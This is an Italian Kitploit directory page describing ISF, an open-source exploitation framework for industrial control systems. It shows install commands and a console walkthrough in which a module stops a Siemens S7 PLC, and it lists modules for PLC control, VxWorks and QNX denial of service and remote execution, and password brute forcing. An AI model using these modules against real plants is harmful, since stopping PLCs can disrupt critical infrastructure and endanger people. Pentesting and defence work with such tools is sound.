Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
isf — ISF (Industrial Control System Exploitation Framework), un framework di exploitation basato su Python. | Kitploit
Strumenti/GitHubGitHub/dark-lbp/isf
Frameworks per Penetration TestingFramework di ExploitMappatura della ReteAnalisi delle VulnerabilitàExploitSicurezza SCADA/ICSRaccolta InformazioniFuzzingSviluppo PayloadArchived
GitHubdark-lbp/isf

isf

1.1k3012 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ISF (Industrial Control System Exploitation Framework), un framework di exploitation basato su Python.

Vedi Repository

Framework di Sfruttamento Industriale

ISF (Industrial Exploitation Framework) è un framework di sfruttamento basato su Python, simile al framework metasploit.

ISF è basato sul progetto open source routersploit.

Leggi questo in altre lingue: English, 简体中文,

Disclaimer

L'uso di ISF per attaccare obiettivi senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

Client di Protocollo ICS

NomePercorsoDescrizione
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyClient Modbus-TCP
wdb2_clienticssploit/clients/wdb2_client.pyClient WdbRPC Versione 2 (Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pyClient s7comm (PLC S7 300/400)

Modulo Exploit

Modulo Scanner

Modulo di Protocolli ICS (Modulo Scapy)

Questi protocolli possono essere utilizzati in altri framework di fuzzing come Kitty o per creare il proprio client.

Installazione

Dipendenze Python

  • gnureadline (solo OSX)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy Suggeriamo di installare scapy manualmente seguendo questo documento ufficiale

Installazione su Kali

root@kitploit:~
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Utilizzo

root@kitploit:~
    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Nota     : ICSSPOLIT è un fork di routersploit su
               https://github.com/reverse-shell/routersploit
    Team di sviluppo : wenzhe zhu (dark-lbp)
    Versione  : 0.1.0
    
    Exploits: 2 Scanner: 0 Credenziali: 13
    
    Exploit ICS:
        PLC: 2          Switch ICS: 0
        Software: 0
    
    isf >

Exploit

root@kitploit:~
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

È possibile usare il tasto Tab per il completamento.

Opzioni

Mostra le opzioni del modulo:

root@kitploit:~
isf (S7-300/400 PLC Control) > show options

Opzioni del target:

   Nome       Impostazioni correnti     Descrizione
   ----       ----------------     -----------
   target                          Indirizzo del target es. 192.168.1.1
   port       102                  Porta del target


Opzioni del modulo:

   Nome        Impostazioni correnti     Descrizione
   ----        ----------------     -----------
   slot        2                    Numero slot CPU.
   command     1                    Comando 0: avvia plc, 1: arresta plc.


isf (S7-300/400 PLC Control) >

Imposta opzioni

root@kitploit:~
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Esegui il modulo

root@kitploit:~
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Visualizza informazioni sull'exploit

root@kitploit:~
isf (S7-300/400 PLC Control) > show info

Nome:
S7-300/400 PLC Control

Descrizione:
Use S7comm command to start/stop plc.

Dispositivi:
-  PLC Siemens S7-300 e S7-400 (controllori logici programmabili)

Autori:
-  wenzhe zhu <jtrkid[at]gmail.com>

Riferimenti:

isf (S7-300/400 PLC Control) >

Documenti

  • Utilizzo del client Modbus-TCP
  • Utilizzo del client WDBRPCV2
  • Utilizzo del client S7comm
  • Utilizzo di SNMP_bruteforce
  • Utilizzo del brute force password PLC S7 300/400
  • Utilizzo dello scanner Vxworks 6.x
  • Utilizzo dello scanner Profinet DCP
  • Utilizzo dello scanner PLC S7comm
  • Utilizzo del modulo Profinet DCP Set IP
  • Caricare moduli da cartella extra
  • Come scrivere il proprio modulo
Scarica lo strumento
NomePercorsoDescrizione
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyAvvio/arresto PLC S7-300/400
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyAvvio/arresto/reset PLC S7-1200
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyDoS remoto RPC Vxworks (CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pyAvvio/arresto PLC Schneider Quantum serie 140
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyDoS del servizio TCP Inetd di QNX
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyEsecuzione remota di codice qconn QNX
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyConfigurazione IP dispositivo Profinet DCP
NomePercorsoDescrizione
profinet_dcp_scanscanners/profinet_dcp_scan.pyScanner Profinet DCP
vxworks_6_scanscanners/vxworks_6_scan.pyScanner Vxworks 6.x
s7comm_scanscanners/s7comm_scan.pyScanner S7comm
enip_scanscanners/enip_scan.pyScanner EthernetIP
NomePercorsoDescrizione
pn_dcpicssploit/protocols/pn_dcpProtocollo Profinet DCP
modbus_tcpicssploit/protocols/modbus_tcpProtocollo Modbus TCP
wdbrpc2icssploit/protocols/wdbrpc2Protocollo WDB RPC Versione 2
s7commicssploit/protocols/s7comm.pyProtocollo S7comm